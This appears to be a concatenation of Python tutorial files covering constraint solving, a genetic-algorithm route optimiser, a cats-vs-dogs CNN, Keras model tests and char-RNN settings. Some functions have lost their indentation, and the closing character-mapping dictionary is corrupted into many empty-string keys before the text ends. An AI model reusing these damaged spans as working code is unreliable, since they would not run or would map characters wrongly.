gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
    """Solve the n-queens problem and return all solutions.

    Variable ``xi`` is board column i; its value is the row (1..n) of the
    queen placed in that column.

    BUG FIX: the original kept the variables in a *set* (arbitrary pairing
    order) and only constrained adjacent pairs with ``a != b + i`` — one
    diagonal direction, adjacent columns only.  A correct formulation needs
    ``|row_i - row_j| != |i - j|`` for every pair of columns.
    """
    problem = Problem()
    variables = [f'x{i}' for i in range(n)]
    problem.addVariables(variables, Domain(set(range(1, n + 1))))
    # No two queens in the same row.
    problem.addConstraint(AllDifferentConstraint())
    # No two queens on the same diagonal, for every pair of columns.
    for i in range(n):
        for j in range(i + 1, n):
            problem.addConstraint(
                lambda a, b, d=j - i: abs(a - b) != d,
                (variables[i], variables[j]))
    return problem.getSolutions()
def magic_square(n=3):
    """Return all n x n magic squares over the values 1..n**2.

    BUG FIXES relative to the original:
      * the domain was ``range(1, n**2 + 2)`` — one value (n**2 + 1) too many;
      * the variables were kept in a *set*, so the order in which values
        reached the constraint did not match the row-major reshape;
      * the anti-diagonal was never checked;
      * a debug ``print`` ran inside the constraint on every partial success.
    """
    # Row-major variable order, so reshape(values, (n, n)) is the board.
    variables = [f'x{i}{j}' for i in range(1, n + 1) for j in range(1, n + 1)]

    def all_equal(*values):
        # Every row, column and both diagonals must share one sum.
        square = np.reshape(values, (n, n))
        target = sum(np.diagonal(square))
        if sum(np.diagonal(np.fliplr(square))) != target:
            return False
        for i in range(n):
            if sum(square[i, :]) != target or sum(square[:, i]) != target:
                return False
        return True

    problem = Problem()
    problem.addVariables(variables, Domain(set(range(1, n ** 2 + 1))))
    problem.addConstraint(all_equal, variables)
    problem.addConstraint(AllDifferentConstraint())
    return problem.getSolutions()
def plot_queens(solutions):
    # Overlay every solution on one scatter plot: x is the column index
    # parsed from the variable name ('x3' -> 3), y is the row assigned to
    # that column's queen.  Blocks until the window is closed.
    for solution in solutions:
        for row, column in solution.items():
            # NOTE(review): `row` here is actually the variable *name* and
            # `column` its assigned row value — naming is swapped.
            x = int(row.lstrip('x'))
            y = column
            plt.scatter(x, y, s=70)
    plt.grid()
    plt.show()
if __name__ == "__main__":
    # Demo entry point: solve a 4x4 magic square and print each solution.
    # The n-queens demo is kept below for reference:
    # solutions = n_queens(n=12)
    # print(solutions)
    # plot_queens(solutions)
    solutions = magic_square(n=4)
    for solution in solutions:
        print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
    """Show the initial and final TSP routes side by side.

    Each panel scatters the cities and draws the tour through them,
    including the closing segment back to the first city.  Blocks until
    the plot window is closed.
    """
    _, ax = plt.subplots(nrows=1, ncols=2)
    for col, route in zip(ax, [("Initial Route", initial_route),
                               ("Final Route", final_route)]):
        col.title.set_text(route[0])
        route = route[1]
        for city in route:
            col.scatter(city.x, city.y, s=70, c='b')
        col.plot([city.x for city in route], [city.y for city in route], c='r')
        # BUG FIX: the closing segment previously plotted
        # [route[-1].x, route[0].x] against [route[-1].x, route[-1].y],
        # using an x coordinate as a y value; close the tour properly.
        col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
    plt.show()
def animate_progress():
    # Spawns a daemon-less background thread that live-plots the current
    # route (left panel) and the distance-per-generation curve (right
    # panel).  Reads the module globals `route` and `progress`, and polls
    # the `stop_animation` event to know when to stop redrawing.
    global route
    global progress
    global stop_animation
    def animate():
        figure, ax1 = plt.subplots(nrows=1, ncols=2)
        while True:
            ax1[0].clear()
            ax1[1].clear()
            # Left panel: current route and its cities, tour closed back
            # to the starting city.
            ax1[0].title.set_text("Current routes")
            for city in route:
                ax1[0].scatter(city.x, city.y, s=70, c='b')
            ax1[0].plot([city.x for city in route], [city.y for city in route], c='r')
            ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
            # Right panel: best distance per generation so far.
            ax1[1].title.set_text("Current distance")
            ax1[1].plot(progress)
            ax1[1].set_ylabel("Distance")
            ax1[1].set_xlabel("Generation")
            # pause() lets the GUI event loop process the redraw.
            plt.pause(0.05)
            if stop_animation.is_set():
                break
        plt.show()
    Thread(target=animate).start()
class City:
    """A 2-D point on the map; supports `a - b` as Euclidean distance."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def distance(self, city):
        """Return the Euclidean distance between this city and *city*."""
        dx = abs(self.x - city.x)
        dy = abs(self.y - city.y)
        return np.sqrt(dx ** 2 + dy ** 2)

    def __sub__(self, city):
        # `a - b` is shorthand for a.distance(b).
        return self.distance(city)

    def __repr__(self):
        return f"({self.x}, {self.y})"

    def __str__(self):
        return self.__repr__()
class Fitness:
    """Scores a route: total closed-tour length and its reciprocal fitness."""

    def __init__(self, route):
        self.route = route

    def distance(self):
        """Return the total length of the closed tour over ``self.route``.

        Sums ``route[i] - route[i+1]`` for consecutive stops and closes the
        loop from the last stop back to the first.
        """
        distance = 0
        for i in range(len(self.route)):
            from_city = self.route[i]
            # BUG FIX: the original tested `i+i < len(...)` instead of
            # `i+1 < len(...)`, wrapping back to route[0] from the halfway
            # point onwards (and indexing out of range for a 1-stop route).
            to_city = self.route[i + 1] if i + 1 < len(self.route) else self.route[0]
            distance += (from_city - to_city)
        return distance

    def fitness(self):
        # Reciprocal of the tour length: shorter tours score higher.
        return 1 / self.distance()
def generate_cities(size):
    # Generates `size` random City points in a 200x200 area, pushing any
    # point that falls inside the central band (40..160 on either axis)
    # out towards one of the edges so the cities form a rough ring.
    # NOTE: the exact random.randint/random.random call order matters for
    # reproducibility with a fixed seed — do not reorder.
    cities = []
    for i in range(size):
        x = random.randint(0, 200)
        y = random.randint(0, 200)
        if 40 < x < 160:
            # x is central: push y to the top or bottom edge band.
            if 0.5 <= random.random():
                y = random.randint(0, 40)
            else:
                y = random.randint(160, 200)
        elif 40 < y < 160:
            # y is central: push x to the left or right edge band.
            if 0.5 <= random.random():
                x = random.randint(0, 40)
            else:
                x = random.randint(160, 200)
        cities.append(City(x, y))
    return cities
def create_route(cities):
    """Return a random permutation of *cities*; the input is not mutated."""
    return random.sample(cities, k=len(cities))
def initial_population(popsize, cities):
    """Build the first generation: *popsize* independent random routes."""
    population = []
    for _ in range(popsize):
        population.append(create_route(cities))
    return population
def sort_routes(population):
    """Rank every route in *population* by fitness, best first.

    Returns a list of ``(index, fitness)`` tuples sorted by fitness in
    descending order, where ``index`` is the route's position in
    *population*.
    """
    ranked = [(index, Fitness(route).fitness())
              for index, route in enumerate(population)]
    ranked.sort(key=operator.itemgetter(1), reverse=True)
    return ranked
def selection(population, elite_size):
    """Select routes for breeding: elitism plus fitness-proportionate roulette.

    The top `elite_size` routes are kept unconditionally; the remaining
    slots are filled by roulette-wheel picks weighted by cumulative fitness
    percentage. Returns a list of routes the same length as `population`
    (duplicates are possible).
    """
    sorted_pop = sort_routes(population)
    # DataFrame columns: original population index and its fitness score
    df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
    # calculates the cumulative sum
    # example:
    #   [5, 6, 7] => [5, 11, 18]
    df['cum_sum'] = df['Fitness'].cumsum()
    # calculates the cumulative percentage
    # example:
    #   [5, 6, 7] => [5/18, 11/18, 18/18]
    #   [5, 6, 7] => [27.77%, 61.11%, 100%]
    df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
    # elitism: the best elite_size indices pass through unchanged
    result = [ sorted_pop[i][0] for i in range(elite_size) ]
    for i in range(len(sorted_pop) - elite_size):
        # roulette spin in [0, 100); first route whose cumulative
        # percentage covers the pick wins
        # NOTE: the inner loop reuses the name `i`, shadowing the outer
        # counter — harmless here because the outer `i` is never read
        pick = random.random() * 100
        for i in range(len(sorted_pop)):
            if pick <= df['cum_perc'][i]:
                result.append(sorted_pop[i][0])
                break
    return [ population[index] for index in result ]
def breed(parent1, parent2):
    """Ordered crossover: keep a random slice of parent1, fill from parent2.

    The child starts with parent1's cities between two random cut points,
    then appends parent2's remaining cities in their original order.
    """
    cut_a = random.randint(0, len(parent1))
    cut_b = random.randint(0, len(parent2))
    lo, hi = min(cut_a, cut_b), max(cut_a, cut_b)
    segment = [parent1[i] for i in range(lo, hi)]
    filler = [item for item in parent2 if item not in segment]
    return segment + filler
def breed_population(selection, elite_size):
    """Produce the next generation from the selected mating pool.

    The first `elite_size` routes pass through unchanged; the rest are bred
    from a shuffled pool, pairing ends-inward (first with last, and so on).
    """
    pool = random.sample(selection, len(selection))
    children = list(selection[:elite_size])
    n = len(selection)
    for k in range(n - elite_size):
        children.append(breed(pool[k], pool[n - k - 1]))
    return children
def mutate(route, mutation_rate):
    """Swap-mutate `route` in place and return the same list.

    Each position independently has `mutation_rate` probability of being
    exchanged with another uniformly chosen position.
    """
    n = len(route)
    for pos in range(n):
        if(random.random() < mutation_rate):
            other = random.randint(0, n - 1)
            route[pos], route[other] = route[other], route[pos]
    return route
def mutate_population(population, mutation_rate):
    """Apply mutate() to every route; each route is mutated in place."""
    return [mutate(individual, mutation_rate) for individual in population]
def next_gen(current_gen, elite_size, mutation_rate):
    """Advance one generation: select, breed, then mutate."""
    survivors = selection(population=current_gen, elite_size=elite_size)
    offspring = breed_population(selection=survivors, elite_size=elite_size)
    return mutate_population(offspring, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
    """Run the GA over `cities` and return (initial_route, final_route, distance).

    When `plot` is True the module-level `route`/`progress` globals feed the
    animation thread started by animate_progress(); `prn` toggles progress
    printing. Ctrl-C stops evolution early and returns the best route so far.
    """
    # globals are shared with the plotting thread
    global route
    global progress
    population = initial_population(popsize=popsize, cities=cities)
    if plot:
        animate_progress()
    sorted_pop = sort_routes(population)
    initial_route = population[sorted_pop[0][0]]
    # fitness is 1/distance, so distance is recovered by inverting it
    distance = 1 / sorted_pop[0][1]
    if prn:
        print(f"Initial distance: {distance}")
    try:
        if plot:
            # track per-generation distance so the animation can graph it
            progress = [ distance ]
            for i in range(generations):
                population = next_gen(population, elite_size, mutation_rate)
                sorted_pop = sort_routes(population)
                distance = 1 / sorted_pop[0][1]
                progress.append(distance)
                if prn:
                    print(f"[Generation:{i}] Current distance: {distance}")
                route = population[sorted_pop[0][0]]
        else:
            for i in range(generations):
                population = next_gen(population, elite_size, mutation_rate)
                distance = 1 / sort_routes(population)[0][1]
                if prn:
                    print(f"[Generation:{i}] Current distance: {distance}")
    except KeyboardInterrupt:
        # allow the user to stop early; fall through and report best-so-far
        pass
    # tell the animation thread to exit
    stop_animation.set()
    final_route_index = sort_routes(population)[0][0]
    final_route = population[final_route_index]
    if prn:
        print("Final route:", final_route)
    return initial_route, final_route, distance
if __name__ == "__main__":
    # Demo run: 25 edge-biased cities with hand-tuned GA parameters.
    cities = generate_cities(25)
    initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
    # plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
    """
    brief Convert a Matplotlib figure to a PIL Image in RGB format and return it
    param fig a matplotlib figure
    return a Python Imaging Library ( PIL ) image
    """
    # put the figure pixmap into a numpy array
    buf = fig2data ( fig )
    w, h, d = buf.shape
    # BUG FIX: ndarray.tostring() was deprecated and removed from numpy;
    # tobytes() returns the identical byte string.
    # NOTE(review): fig2data shapes its array as (w, h, 3), so unpacking
    # gives (width, height) here, which is the size order frombytes expects;
    # confirm this pairing if fig2data's shape ever changes.
    return Image.frombytes( "RGB", ( w ,h ), buf.tobytes( ) )
def fig2data ( fig ):
    """
    brief Convert a Matplotlib figure to a 3D numpy array of RGB values
    param fig a matplotlib figure
    return a numpy uint8 array shaped (w, h, 3)
    """
    # draw the renderer so the canvas pixel buffer is up to date
    fig.canvas.draw ( )
    # Get the RGB buffer from the figure
    w,h = fig.canvas.get_width_height()
    # BUG FIX: numpy.fromstring() on binary data was deprecated and later
    # removed; frombuffer() reads the same bytes. copy() keeps the array
    # writable, matching fromstring's behaviour.
    buf = numpy.frombuffer ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 ).copy()
    # NOTE(review): tostring_rgb() yields h rows of w pixels, so (h, w, 3)
    # would be the natural shape; (w, h, 3) is kept because fig2img re-flattens
    # the bytes and only uses the axis lengths — confirm before indexing axes.
    buf.shape = ( w, h,3 )
    # rolling a size-3 axis by 3 is a no-op; kept from the original code
    # (the old ARGB comment did not apply since tostring_rgb is already RGB)
    buf = numpy.roll ( buf, 3, axis = 2 )
    return buf
if __name__ == "__main__":
    # Manual test harness for fig2img/cv2 display, currently disabled.
    pass
    # figure = plt.figure()
    # plt.plot([3, 5, 9], [3, 19, 23])
    # img = fig2img(figure)
    # img.show()
    # while True:
    #     frame = numpy.array(img)
    #     # Convert RGB to BGR
    #     frame = frame[:, :, ::-1].copy()
    #     print(frame)
    #     cv2.imshow("test", frame)
    #     if cv2.waitKey(0) == ord('q'):
    #         break
    # cv2.destroyAllWindows()
def realtime_plot(route):
    """Render `route` with matplotlib and show it in an OpenCV window.

    The figure is rasterized through fig2img so no interactive matplotlib
    backend is needed; pressing 'q' in the window closes it.
    """
    figure = plt.figure(figsize=(14, 8))
    plt.title("Real time routes")
    for city in route:
        plt.scatter(city.x, city.y, s=70, c='b')
    xs = [city.x for city in route]
    ys = [city.y for city in route]
    plt.plot(xs, ys, c='r')
    frame = numpy.array(fig2img(figure))
    cv2.imshow("test", frame)
    if cv2.waitKey(1) == ord('q'):
        cv2.destroyAllWindows()
    plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
    """Return the fixed benchmark tour as a list of City objects."""
    coords = [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)]
    return [City(x, y) for x, y in coords]
def train():
    """Grid-search GA hyper-parameters on the fixed city set.

    Runs the genetic algorithm for every (popsize, elite_size,
    mutation_rate) combination, prints each result, and reports the
    combination that produced the shortest final tour.
    """
    cities = load_cities()
    generations = 1000
    popsizes = [60, 100, 140, 180]
    elitesizes = [5, 15, 25, 35, 45]
    mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
    total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
    tries = {}
    combos = ((p, e, m) for p in popsizes for e in elitesizes for m in mutation_rates)
    for iteration, (popsize, elite_size, mutation_rate) in enumerate(combos, start=1):
        init_route, final_route, distance = genetic_algorithm(cities=cities,
                                                              popsize=popsize,
                                                              elite_size=elite_size,
                                                              mutation_rate=mutation_rate,
                                                              generations=generations,
                                                              plot=False,
                                                              prn=False)
        percentage = (iteration / total_iterations) * 100
        print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
        tries[(popsize, elite_size, mutation_rate)] = distance
    # invert the mapping to find which parameters hit the best distance
    # (on a distance tie the last combination tried wins, as before)
    best_distance = min(tries.values())
    reversed_tries = { v:k for k, v in tries.items() }
    best_combination = reversed_tries[best_distance]
    print("Best combination:", best_combination)
if __name__ == "__main__":
    train()
# best parameters found in earlier grid-search runs
# popsize   elitesize   mutation_rate
#  90         25          0.0001
#  110        10          0.001
#  130        10          0.005
#  130        20          0.001
#  150        25          0.001
import os
def load_data(path):
    """
    Load dataset: read the file at `path` and return its lines as a list.
    """
    input_file = os.path.join(path)
    with open(input_file, "r") as handle:
        contents = handle.read()
    return contents.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
    """Assert a compiled Keras model has the expected shapes and loss.

    NOTE(review): `model.loss_functions` is an attribute of older Keras
    versions — confirm it still exists on the Keras release in use.
    """
    # Sequential wraps an inner functional model; unwrap for shape checks
    if isinstance(model, Sequential):
        model = model.model
    assert model.input_shape == (None, *input_shape[1:]),\
        'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
    assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
        'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
        .format(model.output_shape, output_sequence_length, french_vocab_size)
    assert len(model.loss_functions) > 0,\
        'No loss function set. Apply the compile function to the model.'
    assert sparse_categorical_crossentropy in model.loss_functions,\
        'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
    """Build the simple RNN model and validate its shapes and loss."""
    shape = (137861, 21, 1)
    seq_len, fr_vocab = 21, 344
    model = simple_model(shape, seq_len, 199, fr_vocab)
    _test_model(model, shape, seq_len, fr_vocab)
def test_embed_model(embed_model):
    """Build the embedding model and validate its shapes and loss."""
    shape = (137861, 21)
    seq_len, fr_vocab = 21, 344
    model = embed_model(shape, seq_len, 199, fr_vocab)
    _test_model(model, shape, seq_len, fr_vocab)
def test_encdec_model(encdec_model):
    """Build the encoder-decoder model and validate its shapes and loss."""
    shape = (137861, 15, 1)
    seq_len, fr_vocab = 21, 344
    model = encdec_model(shape, seq_len, 199, fr_vocab)
    _test_model(model, shape, seq_len, fr_vocab)
def test_bd_model(bd_model):
    """Build the bidirectional model and validate its shapes and loss."""
    shape = (137861, 21, 1)
    seq_len, fr_vocab = 21, 344
    model = bd_model(shape, seq_len, 199, fr_vocab)
    _test_model(model, shape, seq_len, fr_vocab)
def test_model_final(model_final):
    """Build the final combined model and validate its shapes and loss."""
    shape = (137861, 15)
    seq_len, fr_vocab = 21, 344
    model = model_final(shape, seq_len, 199, fr_vocab)
    _test_model(model, shape, seq_len, fr_vocab)
# Class labels; the index of each name is its numeric label code.
CATEGORIES = ["Dog", "Cat"]
# Every image is resized to IMG_SIZE x IMG_SIZE grayscale.
IMG_SIZE = 100
# Raw dataset and the pre-split train/test folders.
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
# Name (without the .model extension) of the saved Keras model to evaluate.
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
    """Load the image at `path` as grayscale, resized to IMG_SIZE square."""
    grayscale = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    return cv2.resize(grayscale, (IMG_SIZE, IMG_SIZE))
def load_model():
    """Load the trained Keras model saved as '<MODEL>.model'."""
    model_path = f"{MODEL}.model"
    return tf.keras.models.load_model(model_path)
def predict(img):
    """Classify the image file at `img` using the module-level `model`.

    Returns the raw sigmoid output truncated to an int, as before.
    """
    raw = model.predict([prepare_image(img)])[0][0]
    return int(raw)
if __name__ == "__main__":
    # Evaluate the saved model over the whole testing set.
    model = load_model()
    x_test, y_test = [], []
    for code, category in enumerate(CATEGORIES):
        path = os.path.join(TESTING_DIR, category)
        for img in tqdm(os.listdir(path), "Loading images:"):
            # result = predict(os.path.join(path, img))
            # if result == code:
            #     correct += 1
            # total += 1
            # testing_data.append((os.path.join(path, img), code))
            x_test.append(prepare_image(os.path.join(path, img)))
            y_test.append(code)
    # shape to (n, IMG_SIZE, IMG_SIZE, 1) as the network expects
    x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
    # random.shuffle(testing_data)
    # total = 0
    # correct = 0
    # for img, code in testing_data:
    #     result = predict(img)
    #     if result == code:
    #         correct += 1
    #     total += 1
    # accuracy = (correct/total) * 100
    # print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
    # print(x_test)
    # print("="*50)
    # print(y_test)
    print(model.evaluate([x_test], y_test))
    print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
    """Read every image under path/<category> as grayscale.

    Returns a list of (image, code) pairs, where code is the index of the
    category in CATEGORIES. Images are NOT resized here.
    """
    samples = []
    for code, category in enumerate(CATEGORIES):
        folder = os.path.join(path, category)
        for name in tqdm(os.listdir(folder), desc=f"Loading {category} data: "):
            image = cv2.imread(os.path.join(folder, name), cv2.IMREAD_GRAYSCALE)
            samples.append((image, code))
    return samples
def load_training_data():
    """Load (image, label) pairs from the training folder."""
    return load_data(path=TRAINING_DIR)
def load_testing_data():
    """Load (image, label) pairs from the testing folder."""
    return load_data(path=TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
    """Unpickle the cached dataset; returns (features as ndarray, labels)."""
    with open("X.pickle", 'rb') as feature_file:
        features = pickle.load(feature_file)
    with open("y.pickle", 'rb') as label_file:
        labels = pickle.load(label_file)
    return np.array(features), labels
print("Loading data...")
X, y = load()
# Normalize 8-bit pixel values into [0, 1] for the network.
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
# NOTE(review): {val_acc:.2f} is left unformatted by the f-string below and
# is presumably substituted by the Keras checkpoint callback — confirm the
# installed Keras version formats filepath placeholders this way.
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
# save only models that improve on the best validation result so far
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
# block 1: two 32-filter 2x2 convolutions, dropout, 2x2 max-pool
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 2: 64 filters
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 3: 96 filters
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 4: 128 filters
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# NOTE(review): Dense before Flatten applies the layer across the spatial
# dims rather than a flat feature vector — possibly unintended; verify.
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
# single sigmoid unit: binary cat-vs-dog output
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
              optimizer="rmsprop",
              metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256        # Sequences per batch
num_steps = 70          # Number of sequence steps per batch
lstm_size = 256         # Size of hidden layers in LSTMs
num_layers = 2          # Number of LSTM layers
learning_rate = 0.003   # Learning rate
keep_prob = 0.3         # Dropout keep probability
epochs = 20             # Full passes over the training text
# Print losses every N iterations
print_every_n = 100
# Save every N iterations
save_every_n = 500
# CPU threads handed to the TensorFlow session
NUM_THREADS = 12
# to use CPU: hide all CUDA devices so TensorFlow falls back to the CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# session config pinning execution to a single CPU, no GPU
config = tf.ConfigProto(intra_op_parallelism_threads=1,
                        inter_op_parallelism_threads=1,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
